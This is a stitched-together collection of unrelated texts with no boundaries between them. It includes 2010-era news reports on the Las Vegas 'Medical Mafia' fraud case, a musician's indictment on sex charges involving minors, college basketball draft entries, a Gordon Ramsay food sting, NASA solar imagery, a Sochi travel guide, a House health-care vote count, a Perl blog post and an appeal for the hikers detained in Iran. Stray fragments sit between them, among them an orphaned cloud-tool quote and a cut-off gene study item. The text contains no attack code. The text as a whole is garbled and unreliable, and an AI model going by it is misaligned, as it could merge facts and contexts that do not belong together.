Awand 's guilty plea represents just the latest twist in a colorful , long - running prosecution -- dubbed the " Medical Mafia " case -- that had seemingly stymied federal prosecutors only to turn their way in recent months .
Last month , personal injury lawyer Noel Gage pleaded guilty to obstruction of justice ; and in November , spine surgeon Dr. Mark Kabins pleaded guilty to misprision of a felony .
" It 's very significant that each and every defendant who was charged as part of the investigation has now been convicted of a felony , " says Gregory Brower , the former U.S. Attorney for Nevada , who oversaw much of the case and is now in private practice .
" I am happy for my guys who have been slogging through this for the last four years . "
The case began with dramatic allegations that plaintiffs lawyers and surgeons in Las Vegas had conspired to inflate numerous insurance settlements , allegedly by convincing plaintiffs to undergo needless surgery .
According to government witnesses , the group called itself the Medical Mafia and was led by Awand , a charismatic , Bentley - driving medical consultant , who told people he used to be an Army medic and even liked to claim that he had top - secret government clearance .
Prosecutors charged that Awand recruited top doctors to serve as expert witnesses and to treat injured plaintiffs by arranging kickbacks and using his sway over lawyers to offer the doctors protection from malpractice suits .
The doctors allegedly performed complex and sometimes unnecessary spine surgeries that in several cases left patients paralyzed .
Fortune first brought the case to national attention last August .
After Awand was indicted in 2007 on charges of conspiracy and fraud , he moved to Vevay , Ind . and reinvented himself as the proprietor of a Victorian bed - and - breakfast , the Rosemont Inn , with his wife Linda .
( Awand was separately convicted in January on four counts of failing to pay federal taxes . )
The government 's medical mafia investigation began as the result of an odd fender - bender in 2002 .
A federal prosecutor driving to the airport in Las Vegas accidentally rear - ended an office manager on her way to work .
The office manager was referred by Awand to a spine surgeon and a personal injury lawyer , who , despite the minor case , made a large settlement claim against the U.S. government .
A lawyer for the Feds grew suspicious .
Her investigation turned up a pattern of big settlements in cases where Awand had consulted for the plaintiff lawyers , and the same group of doctors repeatedly testified as expert witnesses .
But prosecuting the case was never simple .
While the government alleged that top doctors and lawyers had conspired against the patients and clients they were sworn to serve and had deprived them of honest services , the defendants argued that they had used their best professional judgment in murky cases .
The prosecutors suffered numerous reversals throughout the long - running case .
At one point , a judge threw out the indictments against both Noel Gage and Awand , but the Feds got them reinstated after appealing to the Ninth Circuit Court of Appeals .
Ultimately , the government saw its conspiracy allegations whittled down to that of a single patient , Melodie Simon , a former Olympic volleyball player who underwent spine surgery and became a paraplegic .
Still , in the the guilty plea Awand admits that core allegation :
He acknowledges that he conspired with the patient 's lawyer Gage and the surgeon Kabins to falsely pin the blame for her botched care on an anesthesiologist .
The guilty pleas , which center on Simon 's case , may be neither a bang nor a whimper , but rather a " muddle , " says Awand 's lawyer Harland W. Braun in Los Angeles .
Indeed , although Awand faces a maximum of three years , Braun is expected to request a sentence of four to 10 months .
A plea deal is " always a compromise , " says Braun .
" You do n't have to go through a trial , you do n't have to go through the anguish , and he 's 65 years old so it 's a muddle .
They did n't get what they wanted .
We did n't get what we wanted . "
First Assistant United States Attorney Steve Myhre says his office is pleased with the result .
" These cases are very difficult , " he says .
" To root out fraud in the medical - legal community , that 's what our goal was . "
At the end of the day , his office got three felony convictions .
They got restitution for the victim Melody Simon of close to $ 5.7 million , plus a forfeiture of $ 3.5 million .
Myhre declined to say whether prosecutors are closing their investigation .
At least one local reporter thinks there could be more cases brought , though there was nothing in Awand 's guilty plea to suggest he will become a cooperating witness .
You can hear Katherine Eban discuss the case on Nevada Public Radio .
“
Luckily there are very mature tools on the market which are simple to deploy in the cloud like FLOW .
We can build all of the technology our clients are used to having access to in traditional facilities but within a virtual environment .
”
An intellectual advantage ( Image : Joerg Sarbach / AP / PA )
A GENE variant that ups your risk of developing Alzheimer ’s disease in old age may not be all bad .
It seems that young people with the variant tend to be smarter , more educated and have better memories than their peers .
The discovery may improve the variant ’s negative image ( see “ Yes or no ” ) .
It also suggests why the variant is common despite its debilitating effects in old age .
Carriers of the variant may have an advantage earlier in life , allowing them to reproduce and pass on the variant before its negative effects kick in . …
( CNN ) --
A musician who played in the 1970s pop music group KC & the Sunshine Band was in court Friday to face an indictment on 16 sex charges involving " multiple male juveniles , " an Ohio prosecutor said .
Richard Finch was arrested last month in Licking County , Ohio , after a 17 - year - old boy said he had sexual contact with him .
Investigators said they were looking into other possible victims .
A grand jury indictment this month charges Finch with 10 counts of sexual imposition .
Assistant prosecutor Tracy Van Winkle said the charges involve having sex with someone when it is harmful to them .
Finch also faces three counts of compelling prostitution involving offering money to minors for sex , Van Winkle said .
Two counts involve asking a minor to engage in sex , and one count is a charge of sexual contact with a minor , she said .
A teenager said he had sexual contact with Finch at Finch 's house in Newark , Ohio , the Licking County Sheriff 's Office said in a statement after the arrest .
During an interview with detectives , Finch " disclosed that he did in fact have sexual contact with the juvenile , along with multiple other male teenage juveniles as well ranging from ages 13 to 17 , " the office said .
A pretrial hearing will be held Friday .
Finch is in the Licking County jail ; no trial date has been set , she said .
A statement from Finch and his lawyer was posted on his website soon after his arrest : " They would like to remind everyone that these are just allegations and that Mr. Finch is presumed innocent . "
A more recent posting asking fans to donate to his legal defense fund said Finch had to cancel his plans for " an impending tour " and " a catastrophic economic hardship has taken their place . "
" Those revenue generating possibilities are now gone , and as of this time , Mr. Finch 's attorneys are in the early stages of their investigation , " it said .
Finch played bass and drums with KC & the Sunshine Band .
The group is known for hits such as " That 's the Way ( I Like It ) , " " Get Down Tonight " and " I'm Your Boogie Man . "
He co-wrote many of the band 's biggest hits with Harry Wayne " KC " Casey .
He left the band in 1980 .
Casey disputed that Finch co-founded the band , saying that he started it in 1973 and Finch joined a year later .
However , singles from the band 's first album , " Do It Good , " were released in 1973 and feature Finch .
LEXINGTON , Ky. -- John Wall and DeMarcus Cousins delivered on their promise to help coach John Calipari return Kentucky to national prominence .
Next stop , the NBA .
The freshman All - Americans are among five Kentucky players who declared for the NBA draft on Wednesday , an exodus that includes freshman guard Eric Bledsoe , freshman center Daniel Orton and junior forward Patrick Patterson .
Wall and Cousins are expected to be among the first few players selected after leading the Wildcats to a remarkable turnaround season in Calipari 's first year on the job .
Kentucky went 35 - 3 this season -- Calipari's first as Wildcats coach -- winning the Southeastern Conference regular season and conference tournament titles before falling to West Virginia in the regional finals of the NCAA Tournament .
Calipari met with each player individually and encouraged them to gauge their draft prospects .
" It 's extremely unusual for four freshmen from the same team to have this opportunity , but it's my job as a coach to prepare these young men for such opportunities , " Calipari said .
Players have until May 8 to change their minds , as long as they do n't hire agents .
It 's highly unlikely any of the five players will come back for another season with the Wildcats .
Certainly not Wall , who was the SEC player of the year after averaging 16.6 points , 6.5 assists and 4.3 rebounds while becoming a highlight - reel staple for his breathtaking play in the open floor .
" I 'm not the same player as when I arrived at UK , " Wall said in a statement .
" I believe I 'm ready for the next challenge as Derrick Rose and Tyreke Evans were the last two years under Coach Cal . "
Calipari said early in the season that Wall was more evolved as a freshman than either Rose and Evans -- both of whom starred as point guards for Calipari at Memphis before heading to the NBA .
Wall is a good bet to be the first pick in the draft , the way Rose in 2008 .
The 6 - foot - 4 Wall then spent the next five months largely living up to the hype .
He hit a jumper at the buzzer to lift Kentucky to victory over Miami ( Ohio ) in his first regular season game but did his best to share the spotlight .
His 241 assists set a Kentucky single - season record .
Many of those assists came courtesy of baskets by Cousins , the SEC freshman of the year who will likely join Wall as one of the first players drafted .
The 6 - 11 , 270 - pound center averaged 15.1 points and 9.8 rebounds , numbers that could have been significantly higher if he had n't struggled with foul trouble and his temper early in the season that severely limited his playing time .
When he was on the floor , Cousins was often the team 's most dominant player and once he learned to control his emotions , he became borderline unstoppable .
" Coach challenged me to grow on and off the court this season , " Cousins said .
" I believe my game expanded along with my maturity .
This year was the most fun I 've ever had playing basketball . "
It certainly looked like it while the player nicknamed " Boogie " helped Kentucky return to its place among the national elite .
The Wildcats won their first 20 games and briefly rose to No. 1 in the polls .
It 's a rise that seemed hard for Patterson to fathom during his first two years with the team as the program slumped under former coach Billy Gillispie .
Patterson could have gone to the NBA last spring but opted to stick around to expand his game in Calipari's " dribble - drive " offense while also finishing his degree .
He averaged a career - low 14.3 points but became a better shooter and fit in with his less - experienced teammates .
If the departure of Wall , Patterson and Cousins was expected , Bledsoe 's and Orton 's decision to join their teammates in the draft came as a bit of a surprise .
Bledsoe averaged 11.3 points and proved to be just as fast as Wall in the open floor and an even better long - range shooter .
Bledsoe 's 49 3 - pointers were second on the team and he made eight 3 - pointers in a romp over East Tennessee State in the opening round of the NCAAs .
" I never thought I 'd be in this position after one year , " Bledsoe said .
" Coach Cal pushed us all to be the best we could be and he believes I 'm prepared to take my game to the next level . "
Orton , thought to be a project when he came in , instead became the team 's best defender while filling in for Cousins .
He averaged a modest 3.4 points and 3.3 rebounds per but also finished among the leaders in the SEC in blocks ( 53 ) .
Orton said going against Patterson and Cousins in practice each day helped him believe he could make it in the NBA .
If they all leave , it leaves Calipari with a rebuilding project on par with the one he inherited a year ago .
The departure of Wall and company combined with the graduation of Ramon Harris , Perry Stevenson and Mark Krebs leaves Kentucky with just five players returning next year , only three of whom -- guards DeAndre Liggins and Darnell Dodson and forward Darius Miller -- played significant minutes this season .
Calipari will try to replace them with another highly ranked recruiting class , though one that will find it difficult to duplicate the magic Wall and company brought to Rupp Arena .
The Wildcats already have commitments from center Enes Kanter and Stacey Poole and are considered to be in the mix for a handful of elite recruits , including guard Brandon Knight .
It is not hard to guess what Gordon Ramsay said yesterday when he fell victim to a sting by the Sun newspaper , which caught his London gastro - pubs out using pre-prepared meals including boil - in - a - bag coq au vin at mark - ups of 500 % .
Whatever he said , it probably had an F in it .
The television chef found himself having to defend the practice by which meals are prepared at a kitchen operated by one of his companies in south London and transported in refrigerated vans to his Foxtrot Oscar restaurant and three pubs he runs in Limehouse , Maida Vale and Chiswick .
A spokeswoman said : " Gordon Ramsay Holdings operate a kitchen facility in Wandsworth called GR Logistics .
Here Gordon Ramsay chefs prepare components of dishes devised and produced to the highest Gordon Ramsay standards . "
She went on : " This is only for the supply of Foxtrot Oscar and the three pubs and allows each establishment to control the consistency and the quality of the food served .
GR Logistics also supply a number of other restaurants outside the group with prepared components . "
The statement followed remarks by the chef Darran Ridley at the GR Logistics kitchen to the newspaper 's reporter that he prepared most of the food for Foxtrot Oscar .
" Everything from coq au vin , starters , terrines , snacks , salmon rillettes , various desserts , braised beef in red wine , beef pie mixes .
Anything that takes a long time to cook , any braised items or items in sauces - we do all of that .
" We do coq au vin at £ 2.60 a portion , leg or thigh , in a bag with sauce .
All you have to do is pop it into a pan of boiling water and reheat it . "
The newspaper calculated that the mark - ups in price for diners were nearly 600 % in some cases , with fish cakes that cost £ 1.92 to produce selling for £ 11.25 , while sausage rolls costing 75 p were going for £ 3.50 .
The newspaper 's reporter was told by an assistant manager at Foxtrot Oscar that the food is : " freshly made , definitely .
Gordon wants this - he 's very fixed about this . "
The company said that the food was sealed after preparation , and then taken to Gordon Ramsay 's various establishments - the Narrow in east London , the Warrington in Maida Vale and the Devonshire in Chiswick - in refrigerated vans before being cooked on the premises .
It added that GR Logistics also supplies other , non-Ramsay establishments .
GR Logistics is the catering production arm of Ramsay 's business GR Holdings .
He purchased the kitchen in south London from Albert Roux .
If the practice , which is not exactly new or unknown for restaurants , prompts Ramsay to adopt a more wholesome new catchphrase than his customary expletive - Blue Peter 's " Here 's one I made earlier " comes to mind - he may yet have cause to regret singing the praises of fresh food on one of his Channel 4 programmes two years ago .
He said then : " Using fresh ingredients is the only way to guarantee a great taste and I can't understand how on earth people can ignore fresh food ... that 's where all the flavour is , all the goodness and it's a crime not to use it . "
April 27 , 2010 : Just last week , scientists working with NASA 's new Solar Dynamics Observatory ( SDO ) released the most astonishing movies of the sun anyone had ever seen .
Now , they 're doing it again .
" SDO has just observed a massive eruption on the sun — one of the biggest in years , " says Lika Guhathakurta of NASA headquarters in Washington DC .
" The footage is not only dramatic , but also could solve a longstanding mystery of solar physics . "
Karel Schrijver of Lockheed Martin's Solar and Astrophysics Lab is leading the analysis .
" We can see a billion tons of magnetized plasma blasting into space while debris from the explosion falls back onto the sun surface .
These may be our best data yet . "
A magnetic filament erupts on April 19th .
The black " hair - like object " is a speck of dust on the CCD camera .
Credit : SDO / AIA .
25 MB Quicktime movies : zoomed in or full disk .
The movie , recorded on April 19th , spans four hours of actual time and more than 100,000 km of linear space .
" It 's huge , " says Schrijver .
Indeed , the entire planet Earth could fit between the plasma streamers with room to spare .
Coronal rain .
Encircled are two plasma streamers , one hitting the sun 's surface and another incoming behind it .
Astronomers have seen eruptions like this before , but rarely so large and never in such fluid detail .
As science team member Alan Title of Lockheed Martin pointed out at last week 's press conference , " no other telescope comes close to the combined spatial , temporal and spectral resolution of SDO . "
Schrijver says his favorite part of the movie is the coronal rain .
" Blobs of plasma are falling back to the surface of the sun , making bright splashes where they hit , " he explains .
" This is a phenomenon I 've been studying for years . "
Coronal rain has long been a mystery .
It 's not surprising that plasma should fall back to the sun .
After all , the sun 's gravity is powerful .
The puzzle of coronal rain is how slowly it seems to fall .
" The sun 's gravity should be pulling the material down much faster than it actually moves .
What 's slowing the descent ? " he wonders .
For the first time , SDO provides an answer .
" The rain appears to be buoyed by a ' cushion ' of hot gas , " says Schrijver .
" Previous observatories could n't see it , but it is there . "
One of SDO 's game - changing capabilities is temperature sensing .
Using an array of ultraviolet telescopes called the Atmospheric Imaging Assembly ( AIA ) , the observatory can remotely measure the temperature of gas in the sun 's atmosphere .
Coronal rain turns out to be relatively cool — " only " 60,000 K .
When the rains falls , it is supported , in part , by an underlying cushion of much hotter material , between 1,000,000 and 2,200,000 K .
A color - coded temperature movie of the eruption .
Red and oranges are cool ( 60,000 K - 80,000 K ) ; blues and greens are hot ( 1,000,000 - 2,200,000 K ) .
The black " hair - like object " is a speck of dust on the CCD camera .
Credit : SDO / AIA .
25 MB Quicktime movie .
" You can see the hot gas in the color - coded temperature movie , " says Schrijver .
" Cool material is red , hotter material is blue - green .
The hot gas effectively slows the descent of the coronal rain . "
Dick Fisher , the head of NASA 's Heliophysics Division in Washington DC , has been working in solar physics for nearly forty years .
" In all that time , " he says , " I 've never seen images like this . "
" I wonder , what will next week bring ? "
Author : Dr. Tony Phillips | Editor : Dr. Tony Phillips | Credit : Science@NASA
In my book , The Honest Broker , I describe four modes of engagement by scientists and other experts .
They are ideal types and shown in the ...
The population of Sochi is about 390,000 ( 2015 ) , the area - 177 sq. km .
Sochi is Russia ’s only subtropical resort city located in Krasnodar krai , on the northeast coast of the Black Sea , 1,620 km south of Moscow .
Sochi is informally referred to as the summer , the southern and resort “ capital ” of Russia .
The city is a major transportation hub as well as a large economic and cultural center of the Black Sea coast .
Local time in Sochi city is October 1 , 8:50 am ( +3 UTC ) .
/ September 24 , a state of emergency was introduced in the Olympic Sochi .
Several streets , highways and nearby villages were flooded .
There were landslides , and even the road that leads to the Olympic Park was flooded by 1.5 - 2 meters .
Traffic was almost completely paralyzed in the entire city .
Apparently , the Olympic budget which has grown to $ 50 billion is once again not enough .
/ A resident of Sochi became the owner of a record lottery win for Russia - 364,685,787 rubles ( about 6.5 million USD ) .
The winner of the lottery " 6 out of 45 " bought a ticket for 700 rubles , the winning combination - 11 , 44 , 26 , 3 , 22 , 34 .
According to statistics , 15 lucky Russians become millionaires through lotteries every week .
Sochi history
The territory of Sochi has an ancient history .
The first people appeared in the vicinity of present Sochi about 400 - 350 thousand years ago .
The most famous monument of the Stone Age is Akhshtyr cave inhabited about 250 thousand years ago .
In the first half of the 6th century BC , a large group of Scythian tribes settled on the coast of the Black Sea .
Greek colonization of the Black Sea coast of the Caucasus began with the appearance of city - states in the 6th - 5th centuries BC , and lasted until the 1st century BC .
The period from the 1st century till the 5th century AD was the time of Roman colonization of the Black Sea coast .
In the 6th - 15th centuries , the region was under control of various Christian kingdoms .
As a result of the Russian - Turkish war of 1828 - 1829 , the Russian Empire received the territory of present Sochi .
More Historical Facts …
Sochi was founded as a fort called Alexandria in April 21 , 1838 .
The purpose of the construction of fortifications was the suppression of the slave trade and smuggling of weapons .
In 1839 , the fort received a new name - Navaginskaya fortress .
During the Crimean War of 1853 - 1856 , the local garrisons were transported to Novorossiysk , because of the English - French squadron that appeared in the Black Sea .
In 1864 , the fortress was rebuilt as Dahovsky fort .
Since 1874 , it was known as Dahovsky Posad , from 1896 - Sochi ( after the name of the Sochi River , on the banks of which the fort was standing ) .
In June 14 , 1909 , the first resort “ The Caucasian Riviera ” was opened .
This date is the beginning of Sochi as a resort city .
Sochi became a town in 1917 .
After the Russian Civil War , great attention was paid to the development of Sochi as a resort city .
In 1937 , Sochi became a part of Krasnodar Krai .
On the eve of the Second World War , there were 61 sanatoriums in the city .
51 hospitals were opened on their base in December 1941 .
In 1993 , Sochi acquired the status of a federal resort .
September 15 , 2009 , Sochi joined the World Union of Olympic cities .
Winter Olympic Games 2014 were held in Adler district of Sochi and in Krasnaya Polyana , located 39 km from the coast of the Black Sea .
In October 2010 , an agreement to hold the Grand Prix Formula 1 Russia in Sochi was signed .
The first F1 race was held in the beginning of October 2014 .
The contract is signed until 2020 .
Formula 1 track , built in the Sochi Olympic Park , was designed by Hermann Tilke .
6 matches of FIFA World Cup 2018 were played in Sochi .
Sochi pictures
Sochi is beautiful Author : Vyacheslav Leksin
Sochi - a fashionable old resort town Author : Vyacheslav Leksin
McDonalds in Sochi Author : Vyacheslav Leksin
Sochi features
In 2014 , Sochi became the first city with a subtropical climate which held the Winter Olympics .
Sochi is located approximately midway between the North Pole and the equator , at the latitude of Nice , Toronto and Vladivostok .
The length of the city on the Black Sea coastline is about 145 km .
The urban area is located mainly along the coast , sometimes expanding into the mountain valleys .
Sochi , the urban village of Krasnaya Polyana and a number of settlements located on the southern slopes of the Greater Caucasus mountain range form a municipal formation resort - city of Sochi , also informally referred to as the Big Sochi .
The territory of the Big Sochi is divided into four districts : Adlersky , Hostinsky , Central , and Lazarevsky .
Tourism and related services are the backbone of the local economy .
The Big Sochi has a lot of hotels , motels , restaurants , cafes , bars , entertainment centers , water parks , marinas , piers , etc .
Sochi is a major transportation hub of southern Russia .
Sochi international airport offers flights to Moscow , St. Petersburg , Ekaterinburg , Krasnodar , Novosibirsk , Tyumen , Rostov - on - Don , Istanbul ( Turkey ) , Yerevan ( Armenia ) , Minsk ( Belarus ) and a number of other cities .
Public transport is mainly represented by small buses ( marshrustkas ) , taxis and a small number of buses .
An alternative way is to hire or rent a car .
Sochi climate
Sochi as well as the rest of Russia ’s Black Sea coast south of Tuapse is located in the zone of humid subtropical climate , which strongly distinguishes this region from the northern part of the coast from Anapa to Tuapse , dominated by the typical semi-arid Mediterranean climate .
A similar climate is observed in nearby Abkhazia as well as in the south - eastern United States ( Mississippi , Louisiana , Alabama , Georgia ) .
Maximum precipitation occurs in the winter season , mainly in the form of rain .
Winters are warm , summers are hot and humid .
As the city is located on the northern edge of the subtropics , frosts and snowfalls sometimes occur in winter .
The average temperature in January is plus 6.1 degrees Celsius , in July - plus 23.2 degrees Celsius .
In summer , the water temperature reaches 26 degrees in August .
The average number of sunny days is 211 .
Sochi - a resort city
Sochi seafront Author : Vyacheslav Leksin
Sochi River Author : Vyacheslav Leksin
Hotel Moskva in Sochi Author : Vyacheslav Leksin
Sochi places of interest
The most important factors that attract tourists in Sochi are its warm , subtropical climate , the Black Sea , mineral sources , the proximity of the mountains , relatively well - developed tourist and recreational infrastructure .
Protected areas ( Caucasian Biosphere Reserve , Sochi republican state natural reserve , Sochi National Park ) occupy about 80 % of the total area of the Big Sochi ( 3,502 sq. km . ) .
Colchis forests located partially on the territory of Sochi ( Caucasian Biosphere Reserve ) are the UNESCO World Heritage Site .
“ Rosa Khutor ” ( ski resort in Krasnaya Polyana ) , Krasnaya Polyana ( mountain cluster ) - the venue of the Winter Olympic Games 2014 , the Olympic Park in Adlersky district , Imertinskaya Embankment ( walking area ) are among the main places of interest .
There are more than 30 Orthodox churches and chapels in the city .
Sochi museums
Sochi Art Museum ( Kurortnyy Avenue , 51 ) ,
Ethnographic Museum ( Pobedy Street , 97 ) ,
Literary - Memorial Museum named after N. Ostrovsky ( Korchagina Street , 4 ) ,
Museum of the History of Sochi ( Vorovskogo Street , 54/11 ) ,
Stalin ’s Summer Residence ( Kurortnyy Avenue , 120 ) .
Sochi theaters and other cultural institutions
From tailgaters to people who take cell phone calls during a movie , the world is full of folks who just do n't seem to get society 's rules .
We asked you to help them out with instructional diagrams that will show these people how to avoid doing the everyday annoying things that make us want to strangle them .
The winner is below , but first the runners up ...
Advertisement
We 've heard of images of Jesus or Mary appearing in people 's homes , but here 's a new one on us .
An image of David Beckham appeared on the wall of Daryl Morris 's dining room while he was re-decorating .
This ghostly image of David Beckham 's face appeared when he pulled off an overlapping piece of wallpaper .
Locksmith Mr Morris , of Bedworth , near Coventry , called his wife Zoe into the room who looked up and immediately said : " It 's David Beckham "
Credit : KNS NEWS
While former Florida quarterback Tim Tebow wowed evaluators with his on - field performance at the NFL combine last month , he scored a 22 out of 50 on the Wonderlic test , the Palm Beach Post reported , citing an NFL source .
The 12 - minute test measures an individual 's learning and problem - solving abilities .
According to the Post , the average Wonderlic score for an NFL quarterback is 24 .
The newspaper also reported that the quarterback prospects in Mel Kiper Jr. 's latest rankings on ESPN.com -- Sam Bradford of Oklahoma ( 36 ) , Colt McCoy of Texas ( 25 ) and Jimmy Clausen of Notre Dame ( 23 ) -- scored higher than Tebow .
To put those scores in perspective , the Post compared Wonderlic numbers of run-of - the - mill NFL quarterbacks such as Alex Smith ( 40 ) and Matt Leinart ( 35 ) to those of Pro Football Hall of Famers Dan Marino and Jim Kelly ( both 15 ) and an established star such as Donovan McNabb ( 14 ) of the Philadelphia Eagles .
Tebow is a Heisman Trophy winner who won two national championships at Florida .
According to the newspaper , he graduated with a 3.66 GPA majoring in family , youth and community services .
Grades and Wonderlic scores likely wo n't determine how his NFL future will unfold .
In an attempt to better adapt to the pro game , Tebow is changing the way he holds a football , shifting it from his waist to his shoulder .
He intends to show off his refined style on his pro day for scouts at the University of Florida on Wednesday .
" There are things that I can get a lot better at -- my fundamentals , " Tebow said in February .
" I 've never been asked to shorten or quicken my release and not have a loop in it .
The changes I 'm making have gone very well and it 's becoming more and more natural to me . "
Information from The Associated Press was used in this report .
Washington ( CNN ) --
As House Democratic leaders advised their members Friday to prepare for a legislative battle over health care that could stretch through next weekend , four additional rank - and - file Democrats have come out against the Obama administration 's signature domestic priority .
Reps .
Ben Chandler of Kentucky , Luiz Gutierrez of Illinois , Stephanie Herseth - Sandlin of South Dakota and Heath Shuler of North Carolina say they will vote against their party 's health care plan , which may be headed to a final vote late next week .
" At this time , I am a ' no ' vote on health care , " said Gutierrez in a written statement .
" It 's no secret that I have been critical of proposals that would exclude our nation 's hardworking immigrants from the health care exchange , and I would find it extremely difficult , if not impossible , to vote for any measure that denies undocumented workers health care purchased with their own dollars . "
According to an ongoing CNN survey , 21 House Democrats have now indicated they will vote against the Senate bill when it comes to the floor , though six of those members say they would consider voting for it if it were significantly modified .
Opponents of the bill need a total of 38 Democrats to vote against the measure to ensure its defeat , assuming that all Republican members remain unified in their opposition .
Some members made clear that their votes are not negotiable .
Josh Taylor , a spokesman for Texas Rep. Chet Edwards , told CNN the congressman " voted ' no ' on health care the first time around and will vote ' no ' the second . "
Proponents of the health care plan need 216 votes in order to pass the Senate plan .
As of Friday , no Republicans said they would vote in favor of the bill , which would mean Democratic leaders must rely solely on votes from its own members .
Democrats currently hold 253 House seats .
Of the 39 Democrats who voted against the House plan in November , 14 indicated they would vote against the Senate plan as written , 12 remained uncommitted , and 11 have not returned repeated calls from CNN .
One member , Parker Griffith of Alabama , became a Republican in December .
An additional member , Rep. Eric Massa of New York , resigned his seat on Monday .
Two top Republican vote counters , Sen. Minority Whip Jon Kyl and House Minority Whip Eric Cantor , released a memo Wednesday which acknowledged that a relatively small number of Democrats hold a tremendous amount of sway on the issue .
" We believe House passage of the Senate 's health care bill will ultimately be decided by the 37 remaining House Democrats who voted NO to a government takeover last November , and the ... 21 House Democrats who originally voted YES , but may now be on the fence , " they wrote .
CNN contacted a number of House Democrats who voted in favor of the November House bill and who also represent conservative or competitive districts .
Of those , Reps. Michael Arcuri of New York , Marion Berry of Arkansas , Tim Bishop of New York , Gabrielle Giffords of Arizona , Daniel Lipinski of Illinois , and Bart Stupak of Michigan , said they would vote against the Senate bill as written , but said they would consider supporting it with significant changes .
At least eight members remained uncommitted , saying they would wait to see the final legislation before announcing how they would vote .
Stupak leads a coalition of conservative Democrats who will likely play a key role in the health care vote calculus .
These lawmakers favor modifying the Senate health care bill to include an amendment written by Stupak that will further restrict ways abortions can be funded .
During the House health care reform debate , 64 Democrats voted in favor of the Stupak amendment .
The Michigan congressman has been negotiating with House Democratic leaders in an effort to address the abortion issue and signaled that a resolution was possible .
" Congressman Stupak has not reached an agreement on abortion funding in the health care legislation , " said Michelle Begnoche , a Stupak spokeswoman .
" Last Thursday , the Congressman had meaningful discussions with Chairman [ Henry ] Waxman and Majority Leader [ Steny ] Hoyer .
Congressman Stupak expects further meetings this week and remains optimistic that language can be worked out . "
Modifying the Senate bill would require use of a parliamentary procedure known as reconciliation which allows a measure to pass with a simple majority vote of 51 , rather than the 60 votes needed to block a filibuster .
The reconciliation process adds wrinkles to an already complicated vote count for Democrats , with several members like Arcuri holding open the possibility of supporting the bill if certain changes are made to the legislation .
" From the beginning , Congressman Arcuri has been opposed to the Senate bill , " Arcuri spokesman Jay Biba said in a statement to CNN .
" If there are so - called ' guaranteed fixes ' from the Senate through the reconciliation process , Congressman Arcuri would carefully review these changes by the Senate and would need some way to ensure that their ' guarantees ' would absolutely be included in a final bill .
As with any piece of legislation he would review all proposed changes before casting his vote . "
House Majority Whip James Clyburn told CNN last week that he does not have a hard count of how his fellow Democrats will vote .
" We do n't know exactly what to whip , " the South Carolina Democrat said .
" And that 's why we are waiting on these fixers to take place , and the moment we get the fixers done , post them for the American people , I will look in on it and the same way the American people will , and then I will know what to go to my caucus with . "
CNN 's Dana Bash , Lisa Desjardins , Evan Glass , Deirdre Walsh and Robert Yoon contributed to this report .
If we are to write ever better software , we must relentlessly remove barriers to collaboration .
The gitPAN is important for that reason .
When I worked on Perl Hacks in 2005 , I needed a way to show off the " stuff a code reference in @INC " feature without making an obviously silly and contrived example .
I chose the very real problem of wanting to know which piece of code loaded which module .
This is handy for figuring out dependencies in a program , especially when you want to trim memory usage or reduce complexity .
The resulting code became Devel : : TraceUse .
Perl 5's code - loading semantics are n't entirely simple nor straightforward , and the introspection capabilities of D:: TU need to reflect that .
The module had some bugs and corner cases , and it did n't support some uses I never considered .
Thanks to Schwern and gitPAN , Philippe " BooK " Bruhat forked Devel : : TraceUse on Github to fix bugs and add features .
The new version should be on CPAN shortly .
All I had to do as a maintainer was look over his changes , read the test cases , and give him co-maintainer status on the CPAN .
If I wanted to fix a typo in the documentation or make a very , very quick change , all I had to do was fork his own copy , make a change , and send a pull request -- all from the browser window .
It helps that I 've known BooK virtually for years and I trust his code and judgment .
Yet it also helps that we can take advantage of software and services that make forking a positive act , as something lightweight and temporary and creative which we intend to merge again soon .
Sharing code on the CPAN is good , very good .
So is tracking bugs and attaching patches .
Yet stepping slightly beyond that to make our distribution system into a repository where we encourage modification and experimentation ( always with an eye toward merging ) is even better .
An article of mine published on Monthly Review Zine , Counter Currents and Free the Hikers Blog .
Please check it out and take action to free the hikers .
Why You Should Care about the Three Americans Held in Iran
by Scott Campbell
Watching the news in August 2009 , you may have heard about three U.S. citizens being detained in Iran .
Arrested for allegedly crossing the Iran - Iraq border on July 31 , 2009 , they remain in detention nine months later in Iran 's Evin prison .
Dubbed " the hikers " due to the fact that they were on a hiking trip in the Kurdish region of Iraq when they were detained , in their nine months of imprisonment Sarah Shourd , Shane Bauer , and Josh Fattal have had only three visits from Swiss consular officials , have been permitted only one brief phone call to their families , and have been denied access to their Iranian lawyer .
Their mothers applied for Iranian visas more than four months ago and have received no response .
Though Iranian officials occasionally sputter about " espionage , " the only charge they face is " illegal border crossing , " punishment for which is a fine , not indefinite detention .
All of this is outrageous enough , but the picture is even bleaker .
Thursday , April 22 , was the most recent visit to the hikers by the Swiss -- the first since October .
Sarah -- who is in solitary confinement -- told them she is suffering from depression and a severe gynecological condition .
Shane , originally also held in solitary but now sharing a cell with Josh , told them he is enduring a stomach ailment .
The three of them are considering beginning a hunger strike , despite their poor health and isolation .
The three have lamentably become political pawns in the U.S. - Iranian staring contest .
The fact is , despite the West 's belligerence towards Iran , these three individuals demand our support and solidarity .
Though they were simply on a hike , they are much more than hikers -- they are individuals dedicated to working for a better , more just , and more sustainable world .
They are comrades , fellow travelers , activists , organizers , whatever you may want to call them .
It is pertinent to mention that Sarah and Shane are good friends whom I 've known for several years .
I first met Sarah in the San Francisco Bay Area in 2005 when we organized locally to support immigrant rights and participate in the historic May Day marches of 2006 and sent groups down to the border with Mexico to confront nativist vigilantes like the Minutemen .
She and Shane lived in a house in Oakland that served as the base for the Midnight Special Law Collective , which provides legal support and much more to activists around the country .
In 2007 and 2008 , we all worked with Direct Action to Stop the War to organize a series of civil disobedience and direct action efforts to mark the fifth anniversary of the war on Iraq .
Before moving to Syria together , Sarah spent time doing solidarity work with the Zapatistas in Chiapas and Shane went to Iraq to document the U.S. occupation , as well as making two trips to Darfur where he covered the rebels fighting the Sudanese army and militias .
In Syria , they lived in a Palestinian refugee camp and did Palestine solidarity work , as well as visiting their friend Tristan Anderson in an Israeli hospital where he has been ever since being shot in the head by an Israeli soldier with a high - velocity tear gas canister while protesting against the separation wall in the West Bank .
Before heading to Kurdistan , Sarah worked with Iraqi refugees , while Shane reported on the U.S. 's creation of death squads in Iraq for The Nation .
Having never met Josh , I unfortunately know less about him .
He spent time at the Aprovecho Research Center working on issues such as sustainable agriculture , food justice , and permaculture .
He is deeply committed to issues of ecology and truly democratic politics .
Sarah , Shane , and Josh are not three random Americans .
They are allies in the struggle for a better world .
And right now they are in a dire situation .
In that spirit , I ask for your help .
